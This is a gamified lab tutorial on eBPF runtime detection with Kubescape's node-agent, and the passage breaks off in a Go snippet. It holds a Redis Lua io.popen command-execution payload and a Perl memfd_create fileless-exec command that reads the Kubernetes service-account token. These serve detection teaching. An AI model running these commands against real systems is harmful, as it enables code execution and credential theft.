An eBPF Adventure



The Realm -- Enter the Dungeon



Welcome, adventurer. In this quest you trace a fileless execution from the moment memfd_create fires in the Linux kernel to the moment node-agent raises R1005 ("Fileless execution detected"). Along the way you meet the Fellowship and learn how eBPF-based runtime detection works.

No prior eBPF knowledge is required. If you can run kubectl and read Go, you are ready.



The Dungeon Map

You stand at the threshold of an ancient fortress buried beneath every running container. A single event, execve("/proc/self/fd/3"), will be your torch as you descend. By the time it emerges from the far tower, it will have been captured, translated, ordered, enriched, archived, judged, and proclaimed. This is the Dungeon of the Running Container.





The Fellowship

| Room | Guardian | Component | Repo | What They Do |
|---|---|---|---|---|
| 1 | The Kernel | Linux kernel | - | Executes memfd_create + execve without judgment |
| 2 | Inspector Gadget | trace_exec eBPF gadget | node-agent | Captures every execve in every container |
| 3 | The Scribes | ExecOperator | node-agent | Parses raw eBPF args into Go structs |
| 4 | The Timekeeper | OrderedEventQueue | node-agent | Sorts events by nanosecond timestamp |
| 5 | The Loremaster | EventEnricher | node-agent | Builds process tree + K8s context |
| 6 | The Archivist | ProfileManager | node-agent | Records "normal" behavior during learning |
| 7 | The Vault Keeper | Storage PreSave | storage | Collapses paths via trie algorithm |
| 8 | The Inquisitor | CEL RuleManager | node-agent | Evaluates R1005 against event.exepath |
| 9 | The Herald | Exporter | node-agent | Ships alerts to stdout / AlertManager / HTTP |
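To make the Timekeeper's job concrete, here is a minimal Go sketch of ordering events by nanosecond timestamp. It is not node-agent's OrderedEventQueue; the `Event` type and the `orderByTimestamp` function are hypothetical names used only for illustration.

```go
package main

import (
	"fmt"
	"sort"
)

// Event is a hypothetical, stripped-down stand-in for a captured exec event.
type Event struct {
	TimestampNs uint64 // event timestamp in nanoseconds
	Comm        string // process name
}

// orderByTimestamp returns a copy of events sorted by ascending timestamp.
// sort.SliceStable keeps the arrival order of events with equal timestamps.
func orderByTimestamp(events []Event) []Event {
	sorted := make([]Event, len(events))
	copy(sorted, events)
	sort.SliceStable(sorted, func(i, j int) bool {
		return sorted[i].TimestampNs < sorted[j].TimestampNs
	})
	return sorted
}

func main() {
	// Events may arrive out of order, so they are reordered before evaluation.
	events := []Event{
		{TimestampNs: 300, Comm: "id"},
		{TimestampNs: 100, Comm: "redis-server"},
		{TimestampNs: 200, Comm: "sh"},
	}
	for _, e := range orderByTimestamp(events) {
		fmt.Println(e.TimestampNs, e.Comm)
	}
}
```

Ordering matters because later rooms, such as the process tree built by the Loremaster, assume that a parent's exec is seen before its child's.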

What is eBPF? Small verified programs that run inside the kernel, observing syscalls without modifying kernel source or loading modules. The kernel's verifier guarantees safety before execution. Think of it as invisible enchantment threads woven into the kernel fabric.

Setting Up the Realm

A penguin from the cold lands of Finland, with a somewhat stern demeanor

Step 1: Deploy Kubescape with runtime detection

Wait for the node-agent DaemonSet, the storage Deployment, the CRDs, and the remaining components to become ready, then check that everything is running and healthy:

kubectl get all -n kubescape

Step 2: Deploy a vulnerable Redis

Our image (ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10) is Redis 7.2.10 with a lot of unnecessary functionality and far too little hardening. We use it to mimic CVE-2022-0543, a packaging issue in Debian-based Redis distributions. What we show you below is not a real vulnerability. Real exploits can often escape the Redis Lua sandbox, but they tend not to be deterministic in lab environments such as this one. The point of this lab is not the exploit but the detection of fileless execution via memfd + /proc/self/fd. If you are so inclined, you can look up the actual exploit, recreate it, and detect it.

kubectl -n redis get all

Step 3: Check alerts during benign traffic

In Terminal1, run

kubectl logs -n kubescape -l app=node-agent -c node-agent -f

Node-agent builds an ApplicationProfile of "normal" behavior. In a second terminal (Terminal2), exercise the operations Redis would use in production:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec "$REDIS_POD" -- redis-cli PING

kubectl -n redis exec "$REDIS_POD" -- redis-cli SET bobtest hello

kubectl -n redis exec "$REDIS_POD" -- redis-cli GET bobtest

kubectl -n redis exec "$REDIS_POD" -- redis-cli INFO server

kubectl -n redis exec "$REDIS_POD" -- redis-cli DBSIZE

kubectl -n redis exec "$REDIS_POD" -- redis-cli EVAL "return 'hello'" 0

kubectl -n redis exec "$REDIS_POD" -- redis-cli DEL bobtest

If you check the logs in Terminal1, you should see no alerts. This is because we have previously taught The Archivist (see Room 6) that the above commands are allowed for Redis.
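The learn-then-detect idea behind The Archivist can be sketched in a few lines of Go. This is only an illustration of the concept, not the ApplicationProfile format or node-agent's ProfileManager; the `Profile` type and its methods are hypothetical. The paths are taken from the alerts later in this lab.

```go
package main

import "fmt"

// Profile is a hypothetical, simplified allow-list of executable paths.
type Profile struct {
	learning bool
	execs    map[string]bool
}

// NewProfile returns a profile that starts in the learning phase.
func NewProfile() *Profile {
	return &Profile{learning: true, execs: make(map[string]bool)}
}

// Observe records path while learning. Once learning is complete,
// it reports whether path was never seen during learning.
func (p *Profile) Observe(path string) (unexpected bool) {
	if p.learning {
		p.execs[path] = true
		return false
	}
	return !p.execs[path]
}

// Complete ends the learning phase.
func (p *Profile) Complete() { p.learning = false }

func main() {
	p := NewProfile()
	p.Observe("/usr/local/bin/redis-server") // seen during learning
	p.Complete()

	fmt.Println(p.Observe("/usr/local/bin/redis-server")) // false: part of the profile
	fmt.Println(p.Observe("/usr/bin/dash"))               // true: would raise an alert
}
```

Anything exercised while the profile is learning is treated as normal afterwards, which is why the benign redis-cli commands above stay silent.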

Step 4: Execute the exploit

Phase 1 --- Prove the alerting is working: In Terminal2, run

kubectl -n redis exec "$REDIS_POD" -- redis-cli EVAL "

local f = io.popen('id')

local res = f:read('*a')

f:close()

return 'Test ID: ' .. res

" 0

Expected (in Terminal2): Test ID: uid=999(redis) gid=999(redis) groups=999(redis)

In a current, patched Redis you would instead see "Script attempted to access nonexistent global variable 'io'". Getting the id output back confirms that we are running the unhardened version.

Alerts (in Terminal1)

If Kubescape is installed correctly and everything is working, you should now see two "Unexpected process launched" alerts (R0001) and a handful of "Syscalls Anomalies in container" alerts (R0003).

{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/bin/sh","-c","id"],"exec":"/bin/sh","message":"Unexpected process launched: sh with PID 111770"},"infectedPID":111770,"severity":1,"timestamp":"2026-03-01T17:12:18.988119911Z","trace":{},"uniqueID":"e02cfa37d3e36766b3d4c8757190a398","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"sh","commandLine":"/bin/sh -c id"},"file":{"name":"dash","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server","childrenMap":{"sh␟111770":{"pid":111770,"cmdline":"/bin/sh -c id","comm":"sh","ppid":99476,"pcomm":"redis-server","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash"}}},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: sh with PID 111770","msg":"Unexpected process launched","processtree_depth":"2","time":"2026-03-01T17:12:19Z"}

{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/usr/bin/id"],"exec":"/usr/bin/id","message":"Unexpected process launched: id with PID 111771"},"infectedPID":111771,"severity":1,"timestamp":"2026-03-01T17:12:18.989190515Z","trace":{},"uniqueID":"732769abf49bbc7bb1f0951239713b23","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"id","commandLine":"/usr/bin/id "},"file":{"name":"id","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server","childrenMap":{"sh␟111770":{"pid":111770,"cmdline":"/bin/sh -c id","comm":"sh","ppid":99476,"pcomm":"redis-server","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash","childrenMap":{"id␟111771":{"pid":111771,"cmdline":"/usr/bin/id","comm":"id","ppid":111770,"pcomm":"sh","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/id"}}}}},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: id with PID 111771","msg":"Unexpected process launched","processtree_depth":"3","time":"2026-03-01T17:12:19Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: vfork with PID 99476","syscall":"vfork"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.34440098Z","trace":{},"uniqueID":"b418b1f39648b24e8568033dbe853bdf","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: vfork with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: dup2 with PID 99476","syscall":"dup2"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.332064711Z","trace":{},"uniqueID":"52aea2a22cdf2766b3f2ca48c6494182","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: dup2 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: wait4 with PID 99476","syscall":"wait4"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.364435324Z","trace":{},"uniqueID":"4cbc7380cdf7af107cd8c4378c3c0a63","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: wait4 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getgid with PID 99476","syscall":"getgid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.405230003Z","trace":{},"uniqueID":"5ddee8ba451f8aad1b9d59403ce835b5","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getgid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: geteuid with PID 99476","syscall":"geteuid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.420406502Z","trace":{},"uniqueID":"242f2128e99c30f6624b041dc55c1cd2","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: geteuid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getegid with PID 99476","syscall":"getegid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.440743775Z","trace":{},"uniqueID":"4a1d64b1880c220f7ef907d344b0c973","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getegid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getgroups with PID 99476","syscall":"getgroups"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.489145766Z","trace":{},"uniqueID":"00d28e48bbd818de383997313f113f9d","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getgroups with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getuid with PID 99476","syscall":"getuid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.40487544Z","trace":{},"uniqueID":"a885588f25ef850dcc43fef677f8c95f","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getuid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

We do not particularly care about the details here. These alerts simply confirm that the installation and the alerting pipeline work.
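Raw alert lines like the ones above are hard to scan by eye. The following Go sketch tallies alerts per rule from node-agent's JSON log lines. It reads only the RuleID and BaseRuntimeMetadata.alertName fields that appear in the output above; the `alert` type, the `tally` function, and the file name summarize.go are hypothetical.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"os"
	"sort"
)

// alert holds only the fields this sketch needs from a node-agent log line.
type alert struct {
	RuleID string `json:"RuleID"`
	Base   struct {
		AlertName string `json:"alertName"`
	} `json:"BaseRuntimeMetadata"`
}

// tally parses one JSON log line and increments the counter for its rule.
// Lines that are not JSON or carry no RuleID are skipped.
// It reports whether the line was counted.
func tally(counts map[string]int, line []byte) bool {
	var a alert
	if err := json.Unmarshal(line, &a); err != nil || a.RuleID == "" {
		return false
	}
	counts[a.RuleID+" "+a.Base.AlertName]++
	return true
}

func main() {
	counts := make(map[string]int)
	sc := bufio.NewScanner(os.Stdin)
	// Alert lines are several KB long, so allow lines of up to 1 MiB.
	sc.Buffer(make([]byte, 0, 64*1024), 1024*1024)
	for sc.Scan() {
		tally(counts, sc.Bytes())
	}
	if err := sc.Err(); err != nil {
		fmt.Fprintln(os.Stderr, "reading stdin:", err)
		os.Exit(1)
	}

	// Print the counters in a stable, sorted order.
	keys := make([]string, 0, len(counts))
	for k := range counts {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	for _, k := range keys {
		fmt.Printf("%3d  %s\n", counts[k], k)
	}
}
```

Saved as summarize.go, it could be fed from the same log stream without the -f flag: kubectl logs -n kubescape -l app=node-agent -c node-agent | go run summarize.go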



Phase 2 --- Fileless execution via memfd_create:

Now, it's time for the real threat:

kubectl -n redis exec "$REDIS_POD" -- perl -e '

use strict; use warnings;

my $name = "pwned";

my $fd = syscall(279, $name, 0);

if ($fd < 0) { $fd = syscall(319, $name, 0); }

die "memfd_create failed\n" if $fd < 0;

open(my $src, "<:raw", "/bin/cat") or die;

open(my $dst, ">&=", $fd) or die;

binmode $dst; my $buf;

while (read($src, $buf, 8192)) { print $dst $buf; }

close $src;

exec {"/proc/self/fd/$fd"} "cat",

"/var/run/secrets/kubernetes.io/serviceaccount/token";

'





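This creates an anonymous in-memory file descriptor with memfd_create, copies /bin/cat into it, then calls execve on /proc/self/fd/$fd, which is /proc/self/fd/3 in this run. The script first tries syscall number 279 (memfd_create on arm64) and falls back to 319 (memfd_create on x86_64). The executed copy never touches disk, and the exec triggers R1005.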
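The signal that gives this technique away is visible in the event itself: the exec argument points into /proc/.../fd/, and the resolved path starts with memfd:. The Go sketch below shows one way to test for that. It is an assumption-laden illustration, not the actual R1005 CEL expression; the function name `looksFileless` and the regular expression are hypothetical.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// procFdPath matches /proc/self/fd/<n> and /proc/<pid>/fd/<n>.
var procFdPath = regexp.MustCompile(`^/proc/(self|[0-9]+)/fd/[0-9]+$`)

// looksFileless reports whether an exec event looks like a fileless execution.
// execArg is the path passed to execve; resolvedPath is the name reported
// for the backing file. This is a heuristic: a /proc/.../fd path can also
// refer to an ordinary file on disk.
func looksFileless(execArg, resolvedPath string) bool {
	return strings.HasPrefix(resolvedPath, "memfd:") || procFdPath.MatchString(execArg)
}

func main() {
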